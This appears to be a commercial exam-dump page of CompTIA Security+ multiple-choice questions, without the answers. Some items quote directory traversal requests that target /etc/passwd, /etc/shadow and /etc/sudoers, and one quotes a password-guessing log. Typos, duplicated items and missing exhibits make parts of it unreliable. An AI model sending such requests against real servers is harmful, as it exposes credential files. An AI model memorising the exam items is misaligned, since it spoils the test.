Halloween Special 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: clap70

SY0-601 CompTIA Security+ Exam 2023 Questions and Answers

Questions 4

A security department wants to conduct an exercise that will make many experimental changes to the main virtual server After the exercise is completed, the IT director would like to be able to roll Sack to the state prior to the exercise. Which of the following backup types will allow for the fastest rollback?

Options:

A.

Incremental

B.

Snapshot

C.

Full

D.

Differential

Buy Now
Questions 5

A security analyst locates a potentially malicious video file on a server and needs to identify both the creation date and the file's creator. Which of the following actions would most likely give the security analyst the information required?

Options:

A.

Obtain the file's SHA-256 hash.

B.

Use hexdump on the file's contents.

C.

Check endpoint logs.

D.

Query the file's metadata.

Buy Now
Questions 6

A security team has been alerted to a flood of incoming emails that have various subject lines and are addressed to multiple email inboxes. Each email contains a URL shortener link that is redirecting to a dead domain. Which of the following is the best step for the security team to take?

Options:

A.

Create a blocklist for all subject lines.

B.

Send the dead domain to a DNS sinkhole.

C.

Quarantine all emails received and notify all employees.

D.

Block the URL shortener domain in the web proxy

Buy Now
Questions 7

A security administrator analyzes server logs and sees multiple lines of the following format:

The administrator is concerned about whether the request is valid. Which of the following attacks should the administrator evaluate?

Options:

A.

DLL injection

B.

XML injection

C.

SQL injection

D.

LDAP injection

Buy Now
Questions 8

A security practitioner completes a vulnerability assessment on a company's network and finds several vulnerabilities, which the operations team remediates. Which of the following should be done next?

Options:

A.

Conduct an audit.

B.

Initiate a penetration test.

C.

Rescan the network.

D.

Submit a report.

Buy Now
Questions 9

Several employees received a fraudulent text message from someone claiming to be the Chief Executive Officer (CEO). The message stated:

'Tm in an airport right now with no access to email. I need you to buy gift cards for employee recognition awards. Please send the gift cards to following email address."

Which of the following are the best responses to this situation? (Select two).

Options:

A.

Cancel current employee recognition gift cards.

B.

Add a smishing exercise to the annual company training.

C.

Issue a general email warning to the company.

D.

Have the CEO change phone numbers.

E.

Conduct a forensic investigation on the CEO's phone.

F.

Implement mobile device management.

Buy Now
Questions 10

A spoofed identity was detected for a digital certificate. Which of the following are the type of unidentified key and the certificate that could be in use on the company domain?

Options:

A.

Private key and root certificate

B.

Public key and expired certificate

C.

Private key and self-signed certificate

D.

Public key and wildcard certificate

Buy Now
Questions 11

Which of the following methods can be used to detect attackers who have successfully infiltrated a network? (Select two).

Options:

A.

Tokenization

B.

CI/CD

C.

Honeypots

D.

Threat modeling

E.

DNS sinkhole

F.

Data obfuscation

Buy Now
Questions 12

A security team is reviewing the findings in a report that was delivered after a third party performed a penetration test. One of the findings indicated that a web application form field is vulnerable to cross-site scripting. Which of the following application security techniques should the security analyst recommend the developer implement to prevent this vulnerability?

Options:

A.

Secure cookies

B.

Version control

C.

Input validation

D.

Code signing

Buy Now
Questions 13

Which of the following methods can be used to detect attackers who have successfully infiltrated a network? (Select two).

Options:

A.

Tokenization

B.

CI/CD

C.

Honeypots

D.

Threat modeling

E.

DNS sinkhole

F.

Data obfuscation

Buy Now
Questions 14

While investigating a recent security breach an analyst finds that an attacker gained access by SQL injection through a company website Which of the following should the analyst recommend to the website developers to prevent this from reoccurring?

Options:

A.

Secure cookies

B.

Input sanitization

C.

Code signing

D.

Blocklist

Buy Now
Questions 15

When a newly developed application was tested a specific internal resource was unable to be accessed Which of the following should be done to ensure the application works correctly?

Options:

A.

Modify the allow/deny list for those specific resources

B.

Follow the secure coding practices for the internal resource

C.

Configure the application in a sandbox environment

D.

Utilize standard network protocols

Buy Now
Questions 16

Various stakeholders are meeting to discuss their hypothetical roles and responsibilities in a specific situation, such as a security incident or major disaster. Which of the following best describes this meeting?

Options:

A.

Penetration test

B.

Continuity of operations planning

C.

Tabletop exercise

D.

Simulation

Buy Now
Questions 17

A growing company would like to enhance the ability of its security operations center to detect threats but reduce the amount of manual work required for the security analysts Which of the following would best enable the reduction in manual work?

Options:

A.

SOAR

B.

SIEM

C.

MDM

D.

DLP

Buy Now
Questions 18

Which of the following describes a social engineering technique that may include scam emails addressed directly to the Chief Financial Officer?

Options:

A.

Vishing

B.

Spear phishing

C.

Smishing

D.

Pharming

Buy Now
Questions 19

Which of the following involves an attempt to take advantage of database misconfigurations?

Options:

A.

Buffer overflow

B.

SQL injection

C.

VM escape

D.

Memory injection

Buy Now
Questions 20

Which of the following best describes the action captured in this log file?

Options:

A.

Brute-force attack

B.

Privilege escalation

C.

Failed password audit

D.

Forgotten password by the user

Buy Now
Questions 21

A security analyst is preparing a report that details the circumstances that led to a security incident and steps that can be taken in the future to prevent recurrence. Which of the following best describes this phase of the incident response process?

Options:

A.

Lessons learned

B.

Identification

C.

Recovery

D.

Containment

Buy Now
Questions 22

An organization implemented cloud-managed IP cameras to monitor building entry points and sensitive areas. The service provider enables direct TCP/IP connection to stream live video footage from each camera. The organization wants to ensure this stream is encrypted and authenticated. Which of the following protocols should be implemented to best meet this objective?

Options:

A.

SSH

B.

SRTP

C.

S/MIME

D.

PPTP

Buy Now
Questions 23

An organization with high security needs is concerned about unauthorized exfiltration of data via Wi-Fi from within a secure facility. Which of the following security controls should the company implement?

Options:

A.

Air-gapped network

B.

Faraday cage

C.

Screened subnet

D.

802.1X certificates

Buy Now
Questions 24

Which of the following actions could a security engineer take to ensure workstations and servers are properly monitored for unauthorized changes and software?

Options:

A.

Configure all systems to log scheduled tasks.

B.

Collect and monitor all traffic exiting the network.

C.

Block traffic based on known malicious signatures.

D.

Install endpoint management software on all systems

Buy Now
Questions 25

An IT manager informs the entire help desk staff that only the IT manager and the help desk lead will have access to the administrator console of the help desk software. Which of the following security techniques is the IT manager setting up?

Options:

A.

Hardening

B.

Employee monitoring

C.

Configuration enforcement

D.

Least privilege

Buy Now
Questions 26

Which of the following assists in training employees on the importance of cybersecurity?

Options:

A.

Phishing campaigns

B.

Acceptable use policy

C.

Employee handbook

D.

Social media analysis

Buy Now
Questions 27

Which of the following is a method used by some organizations to recognize and compensate security researchers for finding exploits and vulnerabilities?

Options:

A.

Red team

B.

Foot printing

C.

Bug bounty

D.

Lateral movement

Buy Now
Questions 28

A systems administrator set up an automated process that checks for vulnerabilities across the entire environment every morning. Which of the following activities is the systems administrator conducting?

Options:

A.

Scanning

B.

Alerting

C.

Reporting

D.

Archiving

Buy Now
Questions 29

A security analyst is reviewing SIEM logs during an ongoing attack and notices the following:

http://company.com/get php? f=/etc/passwd

http://company.com/..%2F. .42F..42F.. $2Fetct2Fshadow

http: //company.com/../../../ ../etc/passwd

Which of the following best describes the type of attack?

Options:

A.

SQLi

B.

CSRF

C.

API attacks

D.

Directory traversal

Buy Now
Questions 30

Server administrators want to configure a cloud solution so that computing memory and processor usage are maximized most efficiently across a number of virtual servers. They also need to avoid potential denial-of-service situations caused by availability. Which of the following should administrators configure to maximize system availability while efficiently utilizing available computing power?

Options:

A.

Dynamic resource allocation

B.

High availability

C.

Segmentation

D.

Container security

Buy Now
Questions 31

An attacker was eavesdropping on a user who was shopping online. The attacker was able to spoof the IP address associated with the shopping site. Later, the user received an email regarding credit card statement with unusual purchases. Which of the following attacks took place?

Options:

A.

On-path attack

B.

Protocol poisoning

C.

Domain hijacking

D.

Bluejacking

Buy Now
Questions 32

A security administrator is performing an audit on a stand-alone UNIX server, and the following message is immediately displayed:

(Error 13) : /etc/shadow: Permission denied.

Which of the following best describes the type of tool that is being used?

Options:

A.

Pass-the-hash monitor

B.

File integrity monitor

C.

Forensic analysis

D.

Password cracker

Buy Now
Questions 33

Which of the following security controls is used to isolate a section of the network and its externally available resources from the internal corporate network in order to reduce the number of possible attacks?

Options:

A.

Faraday cages

B.

Air gap

C.

Vaulting

D.

Proximity readers

Buy Now
Questions 34

A company is planning a disaster recovery site and needs to ensure that a single natural disaster would not result in the complete loss of regulated backup data. Which of the following should the company consider?

Options:

A.

Geographic dispersion

B.

Platform diversity

C.

Hot site

D.

Load balancing

Buy Now
Questions 35

Employees in the research and development business unit receive extensive training 10 ensure they understand how to best protect company data. Which of the following is the type of data these employees are most likely to use in day-to-day work activities?

Options:

A.

Encrypted

B.

Intellectual property

C.

Critical

D.

Data in transit

Buy Now
Questions 36

A security analyst needs to centrally manage credentials and permissions to the company's network devices. The following security requirements must be met:

• All actions performed by the network staff must be logged.

• Per-command permissions must be possible.

• The authentication server and the devices must communicate through TCP.

Which of the following authentication protocols should the analyst choose?

Options:

A.

Kerberos

B.

CHAP

C.

TACACS+

D.

RADIUS

Buy Now
Questions 37

Which of the following has the ability to physically verify individuals who enter and exit a restricted area?

Options:

A.

Barricade

B.

Access control vestibule

C.

Access log

D.

Gait analysis

Buy Now
Questions 38

An administrator assists the legal and compliance team with ensuring information about customer transactions is archived for the proper time period. Which of the following data policies is the administrator carrying out?

Options:

A.

Compromise

B.

Retention

C.

Analysis

D.

Transfer

E.

Inventory

Buy Now
Questions 39

A manufacturing organization wants to control and monitor access from the internal business network to the segregated production network, while ensuring minimal exposure of the production network to devices. Which of the following solutions would best accomplish this goal?

Options:

A.

Proxy server

B.

NGFW

C.

WAF

D.

Jump server

Buy Now
Questions 40

Which of the following is the BEST action to foster a consistent and auditable incident response process?

Options:

A.

Incent new hires to constantly update the document with external knowledge.

B.

Publish the document in a central repository that is easily accessible to the organization.

C.

Restrict eligibility to comment on the process to subject matter experts of each IT silo.

D.

Rotate CIRT members to foster a shared responsibility model in the organization

Buy Now
Questions 41

Historically, a company has had issues with users plugging in personally owned removable media devices into corporate computers. As a result, the threat of malware incidents is almost

constant. Which of the following would best help prevent the malware from being installed on the computers?

Options:

A.

AUP

B.

NGFW

C.

DLP

D.

EDR

Buy Now
Questions 42

Which of the following holds staff accountable while escorting unauthorized personnel?

Options:

A.

Locks

B.

Badges

C.

Cameras

D.

Visitor logs

Buy Now
Questions 43

The application development teams have been asked to answer the following questions:

  • Does this application receive patches from an external source?
  • Does this application contain open-source code?
  • Is this application accessible by external users?
  • Does this application meet the corporate password standard?

Which of the following are these questions part of?

Options:

A.

Risk control self-assessment

B.

Risk management strategy

C.

Risk acceptance

D.

Risk matrix

Buy Now
Questions 44

A company is adding a clause to its AUP that states employees are not allowed to modify the operating system on mobile devices. Which of the following vulnerabilities is the organization addressing?

Options:

A.

Cross-site scripting

B.

Buffer overflow

C.

Jailbreaking

D.

Side loading

Buy Now
Questions 45

An organization is concerned about intellectual property theft by employees who leave the organization Which of the following should the organization most likely implement?

Options:

A.

CBT

B.

NDA

C.

MOU

D.

AUP

Buy Now
Questions 46

Which of the following strategies shifts risks that are not covered in an organization's risk strategy?

Options:

A.

Risk transference

B.

Risk avoidance

C.

Risk mitigation

D.

Risk acceptance

Buy Now
Questions 47

Which of the following strengthens files stored in the /etc/shadow directory?

Options:

A.

Key agreement

B.

Digital signatures

C.

Salting

D.

Key stretching

Buy Now
Questions 48

A security analyst reviews web server logs and notices the following lines:

104.35.45.53 - - [22/May/2020:06:57:31 +0100] "GET /show_file.php file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 11705

"http://www.example.com/downloadreport.php "

104.35.45.53 -- [22/May/2020:07:00:58 +0100] "GET /show_file.php

file=%2e%2e%2f%2e%2e%2fetc%2fsudoers HTTP/1.1" 200 23713

"http://www.example.com/downloadreport.php "

Which of the following vulnerabilities has the attacker exploited? (Select TWO).

Options:

A.

Race condition

B.

LFI

C.

Pass the hash

D.

XSS

E.

RFI

F.

Directory traversal

Buy Now
Questions 49

While preparing a software inventory report, a security analyst discovers an unauthorized program installed on most of the company's servers. The program utilizes the same code signing certificate as an application deployed to only the accounting team. After removing the unauthorized program, which of the following mitigations should the analyst implement to BEST secure the server environment?

Options:

A.

Revoke the code signing certificate used by both programs.

B.

Block all unapproved file hashes from installation.

C.

Add the accounting application file hash to the allowed list.

D.

Update the code signing certificate for the approved application.

Buy Now
Questions 50

A security analyst is looking for a way to categorize and share a threat actor's TTPs with colleagues at a partner organization. Which of the following would be the best method to achieve this goal?

Options:

A.

Releasing the lessons-learned report

B.

Using the MITRE ATT&CK framework

C.

Sharing the CVE IDs used in attacks

D.

Sending relevant log files and pcaps

Buy Now
Questions 51

An attacker is trying to gain access by installing malware on a website that is known to be visited by the target victims. Which of the following is the attacker most likely attempting?

Options:

A.

A spear-phishing attach

B.

A watering-hole attack

C.

Typo squatting

D.

A phishing attack

Buy Now
Questions 52

Several users have opened tickets with the help desk. The help desk has reassigned the tickets to a security analyst for further review. The security analyst reviews the following metrics:

Which of the following is most likely the result of the security analyst's review?

Options:

A.

The ISP is dropping outbound connections.

B.

The user of the Sales-PC fell for a phishing attack.

C.

Corporate PCs have been turned into a botnet.

D.

An on-path attack is taking place between PCs and the router.

Buy Now
Questions 53

Which of the following exercises should an organization use to improve its incident response process?

Options:

A.

Tabletop

B.

Replication

C.

Failover

D.

Recovery

Buy Now
Questions 54

The local administrator account for a company's VPN appliance was unexpectedly used to log in to the remote management interface. Which of the following would have prevented this from happening?

Options:

A.

Using least privilege

B.

Changing the default password

C.

Assigning individual user IDs

D.

Implementing multifactor authentication

Buy Now
Questions 55

An attacker is attempting to harvest user credentials on a client's website. A security analyst notices multiple attempts of random usernames and passwords. When the analyst types in a random username and password, the logon screen displays the following message:

The username you entered does not exist.

Which of the following should the analyst recommend be enabled?

Options:

A.

Input validation

B.

Obfuscation

C.

Error handling

D.

Username lockout

Buy Now
Questions 56

Which of the following is the most common data loss path for an air-gapped network?

Options:

A.

Bastion host

B.

Unsecured Bluetooth

C.

Unpatched OS

D.

Removable devices

Buy Now
Questions 57

Which of the following is an example of risk avoidance?

Options:

A.

Installing security updates directly in production to expedite vulnerability fixes

B.

Buying insurance to prepare for financial loss associated with exploits

C.

Not installing new software to prevent compatibility errors

D.

Not taking preventive measures to stop the theft of equipment

Buy Now
Questions 58

A company located in an area prone to hurricanes is developing a disaster recovery plan and looking at site considerations that allow the company to quickly continue operations. Which of the following is the best type of site for this company?

Options:

A.

Cold

B.

Tertiary

C.

Warm

D.

Hot

Buy Now
Questions 59

A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the management team. Which of the following best describes the threat actor in the CISO's report?

Options:

A.

Insider threat

B.

Hacktivist

C.

Nation-state

D.

Organized crime

Buy Now
Questions 60

A secondly administration is trying to determine whether a server is vulnerable to a range of attacks After using a tool, the administrator obtains the following output.

Which of the following attacks was successfully implemented based on the output?

Options:

A.

Memory leak

B.

Race condition

C.

SQL injection

D.

Directory traversal

Buy Now
Questions 61

The Chief Executive Officer (CEO) of an organization would like staff members to have the flexibility to work from home anytime during business hours, including during a pandemic or crisis. However, the CEO is concerned that

some staff members may take advantage of the flexibility and work from high-risk countries while on holiday or outsource work to a third-party organization in another country. The Chief Information Officer believes the company

can implement some basic controls to mitigate the majority of the risk. Which of the following would be best to mitigate the CEO's concerns? (Select two).

Options:

A.

Geolocation

B.

Time-of-day restrictions

C.

Certificates

D.

Tokens

E.

Geotagging

F.

Role-based access controls

Buy Now
Questions 62

A security analyst is reviewing the following command-line output:

Internet address Physical address Type

192.168.1.1 aa-bb-cc-00-11-22 dynamic

192.168. aa-bb-cc-00-11-22 dynamic

192.168.1.3 aa-bb-cc-00-11-22 dynamic

192.168.1.4 aa-bb-cc-00-11-22 dynamic

192.168.1.5 aa-bb-cc-00-11-22 dynamic

--output omitted---

192.168.1.251 aa-bb-cc-00-11-22 dynamic

192.168.1.252 aa-bb-cc-00-11-22 dynamic

192.168.1.253 aa-bb-cc-00-11-22 dynamic

192.168.1.254 aa-bb-cc-00-11-22 dynamic

192.168.1.255 ff-ff-ff-ff-ff-ff static

Which of the following is the analyst observing?

Options:

A.

ICMP spoofing

B.

URL redirection

C.

MAC address cloning

D.

DNS poisoning

Buy Now
Questions 63

Which of the following describes the ability of code to target a hypervisor from inside a guest OS?

Options:

A.

Fog computing

B.

VM escape

C.

Software-defined networking

D.

Image forgery

E.

Container breakout

Buy Now
Questions 64

A company is working with a vendor to perform a penetration test. Which of the following includes an estimate about the number of hours required to complete the engagement?

Options:

A.

SOW

B.

BPA

C.

SLA

D.

NDA

Buy Now
Questions 65

A company would like to provide flexibility for employees on device preference. However, the company is concerned about supporting too many different types of hardware. Which of the following deployment models will provide the needed flexibility with the greatest amount of control and security over company data and infrastructure?

Options:

A.

BYOD

B.

JVDI

C.

COPE

D.

CYOD

Buy Now
Questions 66

A security analyst finds that a user's name appears in a database entry at a time when the user was on vacation. The security analyst reviews the following logs from the authentication server that is being used by the database:

Which of the following can the security analyst conclude based on the review?

Options:

A.

A brute-force attack occurred.

B.

A rainbow table uncovered the password.

C.

Technical controls did not block the reuse of a password.

D.

An attacker used password spraying.

Buy Now
Questions 67

A security analyst is creating baselines for the server team to follow when hardening new devices for deployment. Which of the following best describes what the analyst is creating?

Options:

A.

Change management procedure

B.

Information security policy

C.

Cybersecurity framework

D.

Secure configuration guide

Buy Now
Questions 68

An analyst is trying to identify insecure services that are running on the internal network. After performing a port scan, the analyst identifies that a server has some insecure services enabled on default ports. Which of the following BEST describes the services that are currently running and the secure alternatives for replacing them? (Select THREE).

Options:

A.

SFTP, FTPS

B.

SNMPv2, SNMPv3

C.

HTTP, HTTPS

D.

TFTP, FTP

E.

SNMPW1, SNMPv2

F.

Telnet, SSH

G.

TLS, SSL

Buy Now
Questions 69

Several universities are participating in a collaborative research project and need to share compute and storage resources. Which of the following cloud deployment strategies would best meet this need?

Options:

A.

Community

B.

Private

C.

Public

D.

Hybrid

Buy Now
Questions 70

Which of the following threat vectors would appear to be the most legitimate when used by a malicious actor to impersonate a company?

Options:

A.

Phone call

B.

Instant message

C.

Email

D.

Text message

Buy Now
Questions 71

Which of the following would be most effective to contain a rapidly spreading attack that is affecting a large number of organizations?

Options:

A.

Machine learning

B.

DNS sinkhole

C.

Blocklist

D.

Honey pot

Buy Now
Questions 72

A privileged user at a company stole several proprietary documents from a server. The user also went into the log files and deleted all records of the incident The systems administrator has just informed investigators that other log files are available for review Which of the following did the administrator most likely configure that will assist the investigators?

Options:

A.

Memory dumps

B.

The syslog server

C.

The application logs

D.

The log retention policy

Buy Now
Questions 73

The most recent vulnerability scan flagged the domain controller with a critical vulnerability. The systems administrator researched the vulnerability and discovered the domain controller

does not run the associated application with the vulnerability. Which of the following steps should the administrator take next?

Options:

A.

Ensure the scan engine is configured correctly.

B.

Apply a patch to the domain controller.

C.

Research the CVE.

D.

Document this as a false positive.

Buy Now
Questions 74

Which of the following scenarios describes a possible business email compromise attack?

Options:

A.

An employee receives a gift card request m an email that has an executive's name m the display held to the email

B.

Employees who open an email attachment receive messages demanding payment m order to access files

C.

A service desk employee receives an email from the HR director asking for log-in credentials lo a cloud administrator account

D.

An employee receives an email with a link to a phishing site that is designed to look like the company's email portal.

Buy Now
Questions 75

An attacker posing as the Chief Executive Officer calls an employee and instructs the employee to buy gift cards. Which of the following techniques is the attacker using?

Options:

A.

Smishing

B.

Phishing

C.

Impersonating

D.

Vishing

Buy Now
Questions 76

A wet-known organization has been experiencing attacks from APTs. The organization is concerned that custom malware is being created and emailed into the company or installed on USB stocks that are dropped in parking lots. Which of the following is the best defense against this scenario?

Options:

A.

Configuring signature-based antivirus to update every 30 minutes

B.

Enforcing S/MIME for email and automatically encrypting USB drives upon assertion

C.

Implementing application execution in a sandbox for unknown software

D.

Fuzzing new files for vulnerabilities if they are not digitally signed

Buy Now
Questions 77

An employee finds a USB flash drive labeled "Salary Info" in an office parking lot. The employee picks up the USB flash drive, goes into the office, and plugs it into a laptop. Later, a technician inspects the laptop and realizes it has been compromised by malware. Which of the following types of social engineering attacks has occurred?

Options:

A.

Smishing

B.

Baiting

C.

Tailgating

D.

Pretexting

Buy Now
Questions 78

A help desk technician receives a phone call from someone claiming to be a part of the organization's cybersecurity incident response team. The caller asks the technician to verify the network's internal firewall IP address. Which of the following is the technician's best course of action?

Options:

A.

Direct the caller to stop by the help desk in person and hang up declining any further requests from the caller.

B.

Ask for the caller's name, verify the person's identity in the email directory, and provide the requested information over the phone.

C.

Write down the phone number of the caller if possible, the name of the person requesting the information, hang up, and notify the organization's cybersecurity officer.

D.

Request the caller send an email for identity verification and provide the requested information via email to the caller.

Buy Now
Questions 79

A security analyst has been tasked with ensuring all programs that are deployed into the enterprise have been assessed in a runtime environment Any critical issues found in the program must be sent back to the developer for verification and remediation. Which of the following lost describes the type of assessment taking place?

Options:

A.

Input validation

B.

Dynamic code analysis

C.

Fuzzing

D.

Manual code review

Buy Now
Questions 80

A security engineer must deploy two wireless routers in an office suite Other tenants in the office building should not be able to connect to this wireless network Which of the following protocols should the engineer implement to ensure the strongest encryption?

Options:

A.

WPS

B.

WPA2

C.

WAP

D.

HTTPS

Buy Now
Questions 81

A security analyst is investigating a malware incident at a company The malware is accessing a command-and-control website at www.comptia.com . All outbound internet traffic is logged to a syslog server and stored in /logfiles/messages Which of the following commands would be best for the analyst to use on the syslog server to search for recent traffic to the command-and-control website?

Options:

A.

head -500 www. compt ia.com | grep /logfiles/messages

B.

cat /logfiles/messages I tail -500 www.comptia.com

C.

tail -500 /logfiles/messages I grep www.cornptia.com

D.

grep -500 /logfiles/messages I cat www.comptia.cctn

Buy Now
Questions 82

A security analyst is reviewing logs on a server and observes the following output:

01/01/2020 03:33:23 admin attempted login with password sneak

01/01/2020 03:33:32 admin attempted login with password sneaked

01/01/2020 03:33:41 admin attempted login with password sneaker

01/01/2020 03:33:50 admin attempted login with password sneer

01/01/2020 03:33:59 admin attempted login with password sneeze

01/01/2020 03:34:08 admin attempted login with password sneezy

Which of the following is the security analyst observing?

Options:

A.

A rainbow table attack

B.

A password-spraying attack

C.

A dictionary attack

D.

A keylogger attack

Buy Now
Questions 83

Developers are writing code and merging it into shared repositories several times a day. where it is tested automatically. Which of the following concepts does this best represent?

Options:

A.

Functional testing

B.

Stored procedures

C.

Elasticity

D.

Continuous Integration

Buy Now
Questions 84

A company deployed a Wi-Fi access point in a public area and wants to harden the configuration to make it more secure. After performing an assessment, an analyst identifies that the access point is configured to use WPA3, AES, WPS, and RADIUS. Which of the following should the analyst disable to enhance the access point security?

Options:

A.

WPA3

B.

AES

C.

RADIUS

D.

WPS

Buy Now
Questions 85

A security administrator is analyzing the corporate wireless network. The network only has two access points running on channels 1 and 11. While using airodump-ng. the administrator notices other access points are running with the same corporate ESSID on all available channels and with the same BSSID of one of the legitimate access points. Which of the following attacks is happening on the corporate network?

Options:

A.

On-path

B.

Evil twin

C.

Jamming

D.

Rogue access point

E.

Disassociation

Buy Now
Questions 86

At the start of a penetration test, the tester checks OSINT resources for information about the client environment. Which of the following types of reconnaissance is the tester performing?

Options:

A.

Active

B.

Passive

C.

Offensive

D.

Defensive

Buy Now
Questions 87

The manager who is responsible for a data set has asked a security engineer to apply encryption to the data on a hard disk. The security engineer is an example of a:

Options:

A.

data controller

B.

data owner.

C.

data custodian.

D.

data processor

Buy Now
Questions 88

A company wants to ensure that all employees in a given department are trained on each job role to help with employee burnout and continuity of business operations in the event an employee leaves the company. Which of the following should the company implement?

Options:

A.

Separation of duties

B.

Job rotation

C.

Mandatory vacations

D.

Least privilege

Buy Now
Questions 89

A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and identifies successful logon attempts to access the departed executive's accounts. Which of the following security practices would have addressed the issue?

Options:

A.

A non-disclosure agreement

B.

Least privilege

C.

An acceptable use policy

D.

Off boarding

Buy Now
Questions 90

A security analyst discovers that a large number of employee credentials had been stolen and were being sold on the dark web. The analyst investigates and discovers that some hourly employee credentials were compromised, but salaried employee credentials were not affected.

Most employees clocked in and out while they were inside the building using one of the kiosks connected to the network. However, some clocked out and recorded their time after leaving to go home. Only those who clocked in and out while inside the building had credentials stolen. Each of the kiosks are on different floors, and there are multiple routers, since the business segments environments for certain business functions.

Hourly employees are required to use a website called acmetimekeeping.com to clock in and out. This website is accessible from the internet. Which of the following is the most likely reason for this compromise?

Options:

A.

A brute-force attack was used against the time-keeping website to scan for common passwords.

B.

A malicious actor compromised the time-keeping website with malicious code using an unpatched vulnerability on the site, stealing the credentials.

C.

The internal DNS servers were poisoned and were redirecting acmetimekeeping.com to a malicious domain that intercepted the credentials and then passed them through to the real site.

D.

ARP poisoning affected the machines in the building and caused the kiosks to send a copy of all the submitted credentials to a malicious machine.

Buy Now
Questions 91

An organization is concerned that ils hosted web servers are not running the most updated version of the software. Which of the following would work best to help identify potential vulnerabilities?

Options:

A.

hping3 -S compcia.org -p 80

B.

nc -1 -v comptia.crg -p 80

C.

nmap comptia.org -p 80 -sv

D.

nslookup -port«80 comptia.org

Buy Now
Questions 92

A software company adopted the following processes before releasing software to production

• Peer review

• Static code scanning

• Signing

A considerable number of vulnerabilities are still being detected when code is executed on production Which of the following security tools can improve vulnerability detection on this environment?

Options:

A.

File integrity monitoring for the source code

B.

Dynamic code analysis tool

C.

Encrypted code repository

D.

Endpoint detection and response solution

Buy Now
Questions 93

A company would like to set up a secure way to transfer data between users via their mobile phones The company's top pnonty is utilizing technology that requires users to be in as close proximity as possible to each other. Which of the following connection methods would BEST fulfill this need?

Options:

A.

Cellular

B.

NFC

C.

Wi-Fi

D.

Bluetooth

Buy Now
Questions 94

A customer has reported that an organization's website displayed an image of a smiley (ace rather than the expected web page for a short time two days earlier. A security analyst reviews log tries and sees the following around the lime of the incident:

Which of the following is MOST likely occurring?

Options:

A.

Invalid trust chain

B.

Domain hijacking

C.

DNS poisoning

D.

URL redirection

Buy Now
Questions 95

Which of the following disaster recovery tests is the LEAST time consuming for the disaster recovery team?

Options:

A.

Tabletop

B.

Parallel

C.

Full interruption

D.

Simulation

Buy Now
Questions 96

A new plug-and-play storage device was installed on a PC in the corporate environment. Which of the following safeguards will BEST help to protect the PC from malicious files on the storage device?

Options:

A.

Change the default settings on the PC.

B.

Define the PC firewall rules to limit access.

C.

Encrypt the disk on the storage device.

D.

Plug the storage device in to the UPS

Buy Now
Questions 97

Which of the following roles would MOST likely have direct access to the senior management team?

Options:

A.

Data custodian

B.

Data owner

C.

Data protection officer

D.

Data controller

Buy Now
Questions 98

A junior security analyst is reviewing web server logs and identifies the following pattern in the log file:

Which ol the following types of attacks is being attempted and how can it be mitigated?

Options:

A.

XSS. mplement a SIEM

B.

CSRF. implement an IPS

C.

Directory traversal implement a WAF

D.

SQL infection, mplement an IDS

Buy Now
Questions 99

A company would like to provide flexibility for employees on device preference. However, the company is concerned about supporting too many different types of hardware. Which of the following deployment models will provide the needed flexibility with the GREATEST amount of control and security over company data and infrastructure?

Options:

A.

BYOD

B.

VDI

C.

COPE

D.

CYOD

Buy Now
Questions 100

A company was compromised, and a security analyst discovered the attacker was able to get access to a service account. The following logs were discovered during the investigation:

Which of the following MOST likely would have prevented the attacker from learning the service account name?

Options:

A.

Race condition testing

B.

Proper error handling

C.

Forward web server logs to a SIEM

D.

Input sanitization

Buy Now
Questions 101

A company reduced the area utilized in its datacenter by creating virtual networking through automation and by creating provisioning routes and rules through scripting. Which of the following does this example describe?

Options:

A.

laC

B.

MSSP

C.

Containers

D.

SaaS

Buy Now
Questions 102

A security analyst is investigating multiple hosts that are communicating to external IP addresses during the hours of 2:00 a.m - 4:00 am. The malware has evaded detection by traditional antivirus software. Which of the following types of malware is MOST likely infecting the hosts?

Options:

A.

A RAT

B.

Ransomware

C.

Polymophic

D.

A worm

Buy Now
Questions 103

The Chief Technology Officer of a local college would like visitors to utilize the school's WiFi but must be able to associate potential malicious activity to a specific person. Which of the following would BEST allow this objective to be met?

Options:

A.

Requiring all new, on-site visitors to configure their devices to use WPS

B.

Implementing a new SSID for every event hosted by the college that has visitors

C.

Creating a unique PSK for every visitor when they arrive at the reception area

D.

Deploying a captive portal to capture visitors' MAC addresses and names

Buy Now
Questions 104

A global company is experiencing unauthorized logging due to credential theft and account lockouts caused by brute-force attacks. The company is considering implementing a third-party identity provider to help mitigate these attacks. Which of the following would be the BEST control for the company to require from prospective vendors?

Options:

A.

IP restrictions

B.

Multifactor authentication

C.

A banned password list

D.

A complex password policy

Buy Now
Questions 105

Which of the following isa risk that is specifically associated with hesting applications iin the public cloud?

Options:

A.

Unsecured root accounts

B.

Zero day

C.

Shared tenancy

D.

Insider threat

Buy Now
Questions 106

A systems engineer is building a new system for production. Which of the following is the FINAL step to be performed prior to promoting to production?

Options:

A.

Disable unneeded services.

B.

Install the latest security patches.

C.

Run a vulnerability scan.

D.

Encrypt all disks.

Buy Now
Questions 107

During a Chief Information Security Officer (CISO) convention to discuss security awareness, the attendees are provided with a network connection to use as a resource. As the convention progresses, one of the attendees starts to notice delays in the connection, and the HIIPS site requests are reverting to HTTP Which of the following BEST describes what is happening?

Options:

A.

Birthday collision on the certificate key

B.

DNS hijacking to reroute traffic

C.

Brute force to the access point

D.

ASSLILS downgrade

Buy Now
Questions 108

After a WiFi scan of a local office was conducted, an unknown wireless signal was identified Upon investigation, an unknown Raspberry Pi device was found connected to an Ethernet port using a single connection. Which of the following BEST describes the purpose of this device?

Options:

A.

loT sensor

B.

Evil twin

C.

Rogue access point

D.

On-path attack

Buy Now
Questions 109

A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks Which of the following should the administrator consider?

Options:

A.

Hashing

B.

Salting

C.

Lightweight cryptography

D.

Steganography

Buy Now
Questions 110

As part of a company's ongoing SOC maturation process, the company wants to implement a method to share cyberthreat intelligence data with outside security partners. Which of the following will the company MOST likely implement?

Options:

A.

TAXII

B.

TLP

C.

TTP

D.

STIX

Buy Now
Questions 111

A systems analyst determines the source of a high number of connections to a web server that were initiated by ten different IP addresses that belong to a network block in a specific country. Which of the following techniques will the systems analyst MOST likely implement to address this issue?

Options:

A.

Content filter

B.

SIEM

C.

Firewall rules

D.

DLP

Buy Now
Questions 112

Which of the following biometric authentication methods is the MOST accurate?

Options:

A.

Gait

B.

Retina

C.

Signature

D.

Voice

Buy Now
Questions 113

A network engineer and a security engineer are discussing ways to monitor network operations. Which of the following is the BEST method?

Options:

